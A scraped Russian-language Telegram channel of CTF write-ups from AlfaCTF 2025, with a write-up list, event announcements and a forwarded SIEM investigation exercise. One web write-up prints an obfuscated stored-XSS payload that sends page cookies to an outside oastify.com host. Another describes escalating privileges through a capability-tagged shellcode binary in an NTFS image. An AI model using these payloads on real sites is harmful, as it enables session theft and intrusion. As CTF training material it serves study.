#alfactf2025
Фиксы в лучах заката, автор @purplesyringa
NTFS поддерживает дофига POSIX-совместимых фич в духе разрешений (хочется setuid), но разрешения без -o permissions никак ни на что не влияют, поэтому надо искать какой-то другой способ повысить привилегии.
Утверждается, что
а) ntfs-3g поддерживает эмулияцию xattrs, б) capabilities файлов хранятся в xattrs
т.е. можно создать образ, где шеллкоду повышены разрешения через setcap cap_sys_admin=eip mnt/shellcode, и потом этот бинарь можно запустить на машине
💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Фиксы в лучах заката, автор @purplesyringa
NTFS поддерживает дофига POSIX-совместимых фич в духе разрешений (хочется setuid), но разрешения без -o permissions никак ни на что не влияют, поэтому надо искать какой-то другой способ повысить привилегии.
Утверждается, что
а) ntfs-3g поддерживает эмулияцию xattrs, б) capabilities файлов хранятся в xattrs
т.е. можно создать образ, где шеллкоду повышены разрешения через setcap cap_sys_admin=eip mnt/shellcode, и потом этот бинарь можно запустить на машине
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
Цунами_дедлайнов_Решение_@THL_1xBtc.pdf
266.7 KB
#web #alfactf2025
Студенческая лига
Цунами дедлайнов автор @THL_1xBtc
💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Студенческая лига
Цунами дедлайнов автор @THL_1xBtc
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
#web #alfactf2025
Возвращение стены, автор @Dan1Lev
Точек для XSS тут хватает, это аватар, имена файлов и username. Возможно есть ещё, но не проверял использовал только аватар.
На endpoint /avatar отправляется параметр avatar_url в который можно передать например такую нагрузку
Защита есть только со стороны фронта которая даст отправить только url.
Но для получения флага понимания куда загружать не достаточно, нужно изучить поведение бота.
Бот переходит на нашу страницу если набирается 3 поста, запоминает последний пост, переходит на главную где проходит авторизацию и публикует запомненный пост с нашей страницы.
Флаг добавляется к куки в начале авторизации. Содержимое поста не уязвимо к инъекциям.
Нужно заставить бота остаться на нашей странице. Для этого выдадим ему куки нашего аккаунта с помошью следующей нагрузки к которой был добавлен сбор куки.
Содержимое eval
Но и этого не достаточно. Да, бот будет авторизован, но не найдя на странице форму авторизации бот остановится, в добавок куки добавляется после загрузки страницы.
Для обхода нуно добавить фиктивную форму
Дополнительно бот проверяет есть ли в url /profile/, но это не проблема т.к. авторизованный аккаунт автоматически будет редиректится в профиль.
Финальная нагрузка
После установки создаём 3 поста и спустя мгновение получаем куки с флагом
💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Возвращение стены, автор @Dan1Lev
Точек для XSS тут хватает, это аватар, имена файлов и username. Возможно есть ещё, но не проверял использовал только аватар.
На endpoint /avatar отправляется параметр avatar_url в который можно передать например такую нагрузку
" onerror=alert(1); "
Защита есть только со стороны фронта которая даст отправить только url.
Но для получения флага понимания куда загружать не достаточно, нужно изучить поведение бота.
Бот переходит на нашу страницу если набирается 3 поста, запоминает последний пост, переходит на главную где проходит авторизацию и публикует запомненный пост с нашей страницы.
Флаг добавляется к куки в начале авторизации. Содержимое поста не уязвимо к инъекциям.
Нужно заставить бота остаться на нашей странице. Для этого выдадим ему куки нашего аккаунта с помошью следующей нагрузки к которой был добавлен сбор куки.
" onerror=eval(atob("ZG9jdW1lbnQuY29va2llID0gImFjY2Vzc190b2tlbj1leUpoYkdjaU9pSklVekkxTmlJc0luUjVjQ0k2SWtwWFZDSjkuZXlKemRXSWlPaUpFWVc1TVpYWXhNek0zSWl3aVpYaHdJam94TnpZd05EVXhPRGd3ZlEuOElQTFh3NjZSWjZnbVl2dmtKV2w5a01fRndFdzhseFVTYWI2dDVZV3NSRTsgcGF0aD0vIjsKZmV0Y2goImh0dHBzOi8vaDBpbjYzeXV6Z281MGx0MmUzaDNvejExYXNnajRiczAub2FzdGlmeS5jb20vP2M9Iitkb2N1bWVudC5jb29raWUpOw==")); "Содержимое eval
document.cookie = "access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJEYW5MZXYxMzM3IiwiZXhwIjoxNzYwNDUxODgwfQ.8IPLXw66RZ6gmYvvkJWl9kM_FwEw8lxUSab6t5YWsRE; path=/";
fetch("https://h0in63yuzgo50lt2e3h3oz11asgj4bs0.oastify.com/?c="+document.cookie);
Но и этого не достаточно. Да, бот будет авторизован, но не найдя на странице форму авторизации бот остановится, в добавок куки добавляется после загрузки страницы.
Для обхода нуно добавить фиктивную форму
<form id="login-form"><input name="username"/><input name="password"/><button></button></form>
Дополнительно бот проверяет есть ли в url /profile/, но это не проблема т.к. авторизованный аккаунт автоматически будет редиректится в профиль.
Финальная нагрузка
"onerror=eval(atob("ZG9jdW1lbnQuY29va2llID0gImFjY2Vzc190b2tlbj1leUpoYkdjaU9pSklVekkxTmlJc0luUjVjQ0k2SWtwWFZDSjkuZXlKemRXSWlPaUpFWVc1TVpYWXhNek0zSWl3aVpYaHdJam94TnpZd05EVXhPRGd3ZlEuOElQTFh3NjZSWjZnbVl2dmtKV2w5a01fRndFdzhseFVTYWI2dDVZV3NSRTsgcGF0aD0vIjsKZmV0Y2goImh0dHBzOi8vaDBpbjYzeXV6Z281MGx0MmUzaDNvejExYXNnajRiczAub2FzdGlmeS5jb20vP2M9Iitkb2N1bWVudC5jb29raWUpOw=="));><form id="login-form"><input name="username"/><input name="password"/><button></button></form><img src="После установки создаём 3 поста и спустя мгновение получаем куки с флагом
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8 2
Непослушный мотоцикл.pdf
564.8 KB
#Hard #Coding #Reverse #Network #alfactf2025
IT-лига
Непослушный мотоциклист от @graalogosh
💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
IT-лига
Непослушный мотоциклист от @graalogosh
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12 4
Подборка райтапов с прошедшего AlfaCTF:
Задания кстати все еще доступны
https://alfactf.ru/tasks
🛡 Защита от спама
(https://t.me/writeup_ctf/784)
#Easy #Infra #Web
🎶 Звуки ностальгии
(https://t.me/writeup_ctf/783)
#Easy #Misc #OSINT
🌊 Цунами дедлайнов
(https://t.me/writeup_ctf/793)
#Easy #Web
🌈🎛 Кислотный ретровейв
(https://t.me/writeup_ctf/786)
#Easy #Web
🌴💰 Пальма с биткоинами
(https://t.me/writeup_ctf/785)
#Easy #Web #JS
👨💻🏖 Разработчик на пляже
(https://t.me/writeup_ctf/790)
#Medium #Infra #Dev #Pentest
🎵🌀 Вихрь рик-ролла
(https://t.me/writeup_ctf/789)
#Medium #Web #Logic
🐺🌊 Шакализация волны
(https://t.me/writeup_ctf/788)
#Medium #Web #OAuth #Client
📹🚁 Десант блогеров
(https://t.me/writeup_ctf/787)
#Medium #Web #Logic
🌇🛠 Фиксы в лучах заката
(https://t.me/writeup_ctf/792)
#Hard #Forensics #Linux #Infra #LPE
🥒😈 Дикий огурец
(https://t.me/writeup_ctf/791)
#Hard #Pwn #Python
🏍⚡️ Непослушный мотоциклист
(https://t.me/writeup_ctf/795)
#Hard #Coding #Reverse #Network
🧱🔙 Возвращение стены
(https://t.me/writeup_ctf/794)
#Hard #Web #Client
💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
🛡 Защита от спама
(https://t.me/writeup_ctf/784)
#Easy #Infra #Web
🎶 Звуки ностальгии
(https://t.me/writeup_ctf/783)
#Easy #Misc #OSINT
🌊 Цунами дедлайнов
(https://t.me/writeup_ctf/793)
#Easy #Web
🌈🎛 Кислотный ретровейв
(https://t.me/writeup_ctf/786)
#Easy #Web
🌴💰 Пальма с биткоинами
(https://t.me/writeup_ctf/785)
#Easy #Web #JS
👨💻🏖 Разработчик на пляже
(https://t.me/writeup_ctf/790)
#Medium #Infra #Dev #Pentest
🎵🌀 Вихрь рик-ролла
(https://t.me/writeup_ctf/789)
#Medium #Web #Logic
🐺🌊 Шакализация волны
(https://t.me/writeup_ctf/788)
#Medium #Web #OAuth #Client
📹🚁 Десант блогеров
(https://t.me/writeup_ctf/787)
#Medium #Web #Logic
🌇🛠 Фиксы в лучах заката
(https://t.me/writeup_ctf/792)
#Hard #Forensics #Linux #Infra #LPE
🥒😈 Дикий огурец
(https://t.me/writeup_ctf/791)
#Hard #Pwn #Python
🏍⚡️ Непослушный мотоциклист
(https://t.me/writeup_ctf/795)
#Hard #Coding #Reverse #Network
🧱🔙 Возвращение стены
(https://t.me/writeup_ctf/794)
#Hard #Web #Client
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤3 3
Запреты Роскамбалы.pdf
3.3 MB
#Hard #Web #Infra #alfactf2025
Запреты Роскамбалы от @graalogosh
💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Запреты Роскамбалы от @graalogosh
Please open Telegram to view this post
VIEW IN TELEGRAM
1 10❤1
Модерация и отбор до 17 октября
Всего будет 1000 участников киберучений.
Об учениях:
CyberCamp — это проект по обмену практическим опытом в сфере кибербезопасности. Мы создали новый формат онлайн-мероприятий: участвовать в киберучениях и проходить задания могут не только команды, но и все зрители кэмпа.
Каждый год в рамках CyberCamp проводится онлайн-конференция федерального масштаба и цикл митапов для начинающих и опытных специалистов. Мы создаем среду для повышения экспертизы в ИБ и развиваем комьюнити, в котором можно поделиться знаниями и найти поддержку
Доклады и практические задания для CyberCamp готовят участники комьюнити — пентестеры, форензеры, инженеры и архитекторы ИБ, аналитики SOC. Задания основаны на кейсах из повседневной работы Blue team, Red team и Yellow team.
Задания подъемные, интересные, платформа работает хорошо. Можно потыкать разные инструменты. Основной упор был на BlueTeam. Сложно было совмещать просмотр докладов и решать задачи, но всегда делают запись, можно потом нонстопом просмотреть интересное. В этом году можно учавствовать в соло
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16 10🔥5 1
Forwarded from СНО ВШК
Уже 26 сентября Высшая школа кибербезопасности СПбПУ устроит глубокое погружение в мир кибербезопасности — «Очная ставка» NeoQUEST-2025!
В программе:
Вход свободный!
Бесплатный трансфер до мероприятия в 11:00 от станции метро Политехническая.
СНО ВШК
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2
Forwarded from antiSOCial
Привет!
Давно меня не было в уличных гонках🚗 , а новые задания на Cyberbones сами себя не решат.
Нужно исправлять🖕
Небезопасное хранение данных / Задание 7.1
Укажите имя рабочей станции эйчара, на которой хранится файл с паролем.
Из предыстории нам известно, что злоумышленнику удалось повысить привилегии от имени УЗ HR'a, воспользовавшись паролем администратора b_rivers_admin.
Составим фильтр, где УЗ-объектом будет УЗ админа и действием повышение привилегий:
Получили пачку событий 4648 с хостаcomp-2159.hv-logistics.stf , где процесс-субъект входа имеет следующий путь: с:\users\d_jensen\documents\runascs_net2.exe
Ответ:comp-2159.hv-logistics.stf
Небезопасное хранение данных / Задание 7.2
Приведите пароль учетной записи b_rivers_admin.
Нам уже известен хост, процесс, имя УЗ-субъекта/объекта. Но как найти пароль? Прежде всего, необходимо разобраться что за тулзу использует злоумышленник. Видно, что этот инструмент представляет собой улучшенную версию утилиты runas.exe, которая устраняет некоторые ограничения, самое главное из которых- это использование пароля в команде.
Осталось выполнить поиск по командной строке, использовав всю найденную информацию:
В результате, получаем событие с командной строкой: RunasCs_net2.exe B_Rivers_admin -pzY2oWqz2qn3Ne71W "whoami" -d hv-logistics.stf
Ответ:zY2oWqz2qn3Ne71W
Небезопасное хранение данных / Задание 7.3
Укажите имя файла из фишинговой рассылки, открытие которого привело к развитию атаки.
Вводной информации о письме и его содержании у нас нет, поэтому необходимо рассуждать логически.
У нас есть хост, имя УЗ и факт запуска какого-то файла, в последствии которого атака начала своё развитие.
Обычно, при фишинге используются документы .doc/.docx или таблицы .xls/.xlsx/.xlsm с макросами, поэтому нужно поискать их (период времени лучше расширить на сутки до):
Получили множество событий с документами из папки C:\\Attachments, которые открываются двумя способами: winword.exe и cmd /c start. Теперь, когда мы знаем путь и то, что при запуске этого документа, что-то происходит (является родительской командной строкой, которая вызывает ту или иную активность в результате работы макроса), произведем поиск по object.process.parent.cmdline:
Сделаем сортировку по object.process.cmdline и отметем события, в которых командная строка содержит такую же команду с запуском файла (все команды с winword.exe и .doc/.docx документами)
Получили 4 события с разными .xls файлами. Убираем хэш (32 символа) и получаем чистое название файла. После подбора, получаем правильный ответ.
Ответ:book_withcob.xls
P.S. там еще раздел "Атаки" завезли, ждите разбор🧐
Давно меня не было в уличных гонках
Нужно исправлять
Небезопасное хранение данных / Задание 7.1
Укажите имя рабочей станции эйчара, на которой хранится файл с паролем.
Из предыстории нам известно, что злоумышленнику удалось повысить привилегии от имени УЗ HR'a, воспользовавшись паролем администратора b_rivers_admin.
Составим фильтр, где УЗ-объектом будет УЗ админа и действием повышение привилегий:
object.account.name = "b_rivers_admin" and action = "elevate"
Получили пачку событий 4648 с хоста
Ответ:
Небезопасное хранение данных / Задание 7.2
Приведите пароль учетной записи b_rivers_admin.
Нам уже известен хост, процесс, имя УЗ-субъекта/объекта. Но как найти пароль? Прежде всего, необходимо разобраться что за тулзу использует злоумышленник. Видно, что этот инструмент представляет собой улучшенную версию утилиты runas.exe, которая устраняет некоторые ограничения, самое главное из которых- это использование пароля в команде.
Осталось выполнить поиск по командной строке, использовав всю найденную информацию:
event_src.host = "comp-2159.hv-logistics.stf" and object.name = "runascs_net2.exe" and subject.account.name = "d_jensen" and object.process.cmdline contains "b_rivers_admin"
В результате, получаем событие с командной строкой: RunasCs_net2.exe B_Rivers_admin -p
Ответ:
Небезопасное хранение данных / Задание 7.3
Укажите имя файла из фишинговой рассылки, открытие которого привело к развитию атаки.
Вводной информации о письме и его содержании у нас нет, поэтому необходимо рассуждать логически.
У нас есть хост, имя УЗ и факт запуска какого-то файла, в последствии которого атака начала своё развитие.
Обычно, при фишинге используются документы .doc/.docx или таблицы .xls/.xlsx/.xlsm с макросами, поэтому нужно поискать их (период времени лучше расширить на сутки до):
event_src.host = "comp-2159.hv-logistics.stf" and (object.process.cmdline contains ".doc" or object.process.cmdline contains ".xls") and action = "start" and subject.account.name = "d_jensen"
Получили множество событий с документами из папки C:\\Attachments, которые открываются двумя способами: winword.exe и cmd /c start. Теперь, когда мы знаем путь и то, что при запуске этого документа, что-то происходит (является родительской командной строкой, которая вызывает ту или иную активность в результате работы макроса), произведем поиск по object.process.parent.cmdline:
event_src.host = "comp-2159.hv-logistics.stf" and object.process.parent.cmdline contains "C:\Attachments" and (object.process.parent.cmdline contains ".doc" or object.process.parent.cmdline contains ".xls") and action = "start" and subject.account.name = "d_jensen"
Сделаем сортировку по object.process.cmdline и отметем события, в которых командная строка содержит такую же команду с запуском файла (все команды с winword.exe и .doc/.docx документами)
event_src.host = "comp-2159.hv-logistics.stf" and object.process.parent.cmdline contains "C:\Attachments" and object.process.parent.cmdline not contains ".doc" and object.process.parent.cmdline not contains "winword.exe" and action = "start" and subject.account.name = "d_jensen"
Получили 4 события с разными .xls файлами. Убираем хэш (32 символа) и получаем чистое название файла. После подбора, получаем правильный ответ.
Ответ:
P.S. там еще раздел "Атаки" завезли, ждите разбор
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Чат 💬 Райтапы по CTF{2025}
❤️ Ламповый чатик для котяток и кибер-котлеток
👉 Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ: @writeup_ctf
👉 Наши таски тут: @writeup_ctf_bot
Правила чата: https://telegra.ph/writeup-chat-rules-06-04
👉 Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ: @writeup_ctf
👉 Наши таски тут: @writeup_ctf_bot
Правила чата: https://telegra.ph/writeup-chat-rules-06-04
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
CyberCamp
Мамма миа, киберучения на CyberCamp 2025 близко 🙂
Сегодня в полночь мы закрываем подачу командных заявок — все, с 00:00 10 октября не принимаем, даже если очень-очень хочется.
Что это значит? 🚩
Мы отобрали 1000 участников в 209 командах, и теперь они готовятся…
Сегодня в полночь мы закрываем подачу командных заявок — все, с 00:00 10 октября не принимаем, даже если очень-очень хочется.
Что это значит? 🚩
Мы отобрали 1000 участников в 209 командах, и теперь они готовятся…
❤5
Вот ещё вам небольшая андеграунд ctf платформа. Всем хакать
https://ctf.bug-makers.ru/
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
https://ctf.bug-makers.ru/
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤4
Forwarded from Капибары и CTF 🏆
Доброе утро, кибердрузья! 🥰
Неделя выдалась спокойной, зато на горизонте сразу много интересного — особенно для тех, кто любит пробовать новое и открывать для себя редкие турниры со всего мира. Вот что стоит взять на карандаш💻
⏺ POC CTF Qualification 2025
🕖 12 октября 13:00 — 13 октября 13:00
📍 CTFTime | Официально
⏺ QnQSec CTF 2025
🕖 16 октября 21:00 — 19 октября 21:00
📍 CTFTime | Официально
❗️ Hack.lu CTF 2025
🕖 17 октября 21:00 — 19 октября 21:00
📍 CTFTime | Официально
⏺ LINE CTF 2025
🕖 18 октября 03:00 — 19 октября 03:00
📍 CTFTime | Официально
⏺ H7CTF 2025
🕖 18 октября 06:30 — 19 октября 18:30
📍 CTFTime | Официально
⏺ WebArena
🕖 18 октября 15:30 — 19 октября 15:30
📍 CTFTime | Официально
❗️ КиберОлимп 2025 (отбор)
🕖 18 октября 12:11 — 18:11
📍 Официально
и дополнительно у нас в обзоре представлен
🌱 INGOSight — конкурс для студентов от Ингосстрах
Для участия не обязательно быть IT-гуру — здесь реальный шанс попробовать себя в бизнес-аналитике, продуктовой работе и даже финансах. Нужно собрать команду, предложить идею для сферы благополучия (здоровье, финансы, путешествия, жильё), доказать её жизнеспособность и создать прототип!
Подробнее
Желаем вам уверенности, новых знаний и приятных сюрпризов на каждом CTF!😘 Набирайте опыт — и пусть удача будет на вашей стороне!
#CTF #Анонс #Планы #Календарь
Неделя выдалась спокойной, зато на горизонте сразу много интересного — особенно для тех, кто любит пробовать новое и открывать для себя редкие турниры со всего мира. Вот что стоит взять на карандаш
🕖 12 октября 13:00 — 13 октября 13:00
📍 CTFTime | Официально
Отборочный CTF на легендарную POC Security Conference в Южной Корее! Формат индивидуальный. Проходит в первый раз, сказать что нибудь сложно, но обязательно загляните в обучающий раздел конференции — тренинги и доклады на высоте.
🕖 16 октября 21:00 — 19 октября 21:00
📍 CTFTime | Официально
Дебютный турнир от QnQSec (Иордания). Про них очень много хороших слов в локальном комьюнити Ближнего Востока. В том числе, за обучение и поддержку. Заявлены очень хорошие призы, правда, сайт CTF ещё не работает 🙈
🕖 17 октября 21:00 — 19 октября 21:00
📍 CTFTime | Официально
Самый ожидаемый турнир этой недели! Одно из самых известнейших соревнований в мире CTF! Уже 15-й (!) турнир от FluxFingers (Германия, Рурский университет). Обязательно поучаствуйте, будет интересно!
🕖 18 октября 03:00 — 19 октября 03:00
📍 CTFTime | Официально
Пятый год подряд японские организаторы удивляют интересными, свежими задачами. Попробовать стоит обязательно 👨💻
🕖 18 октября 06:30 — 19 октября 18:30
📍 CTFTime | Официально
Из уникального в этой CTF - это наличие Boot2Root задач! Старенький writeup на такую задачу
🕖 18 октября 15:30 — 19 октября 15:30
📍 CTFTime | Официально
Мероприятие проводит CSEM. Аналог нашего Codeby. Крутая платформа для личной практики — 38 учебных курсов, индивидуальный формат
🕖 18 октября 12:11 — 18:11
📍 Официально
К участию приглашаются учащиеся образовательных организаций высшего и среднего профессионального образования. Формат участия индивидуальный. Финал состоится 27 и 28 ноября в Самаре на базе ПГУТИ.
Очень сильно не нравится доп ограничение:: от одного ВУЗа на финале может быть представлено не более 2 человек.
и дополнительно у нас в обзоре представлен
🌱 INGOSight — конкурс для студентов от Ингосстрах
Для участия не обязательно быть IT-гуру — здесь реальный шанс попробовать себя в бизнес-аналитике, продуктовой работе и даже финансах. Нужно собрать команду, предложить идею для сферы благополучия (здоровье, финансы, путешествия, жильё), доказать её жизнеспособность и создать прототип!
Подробнее
Желаем вам уверенности, новых знаний и приятных сюрпризов на каждом CTF!
#CTF #Анонс #Планы #Календарь
Please open Telegram to view this post
VIEW IN TELEGRAM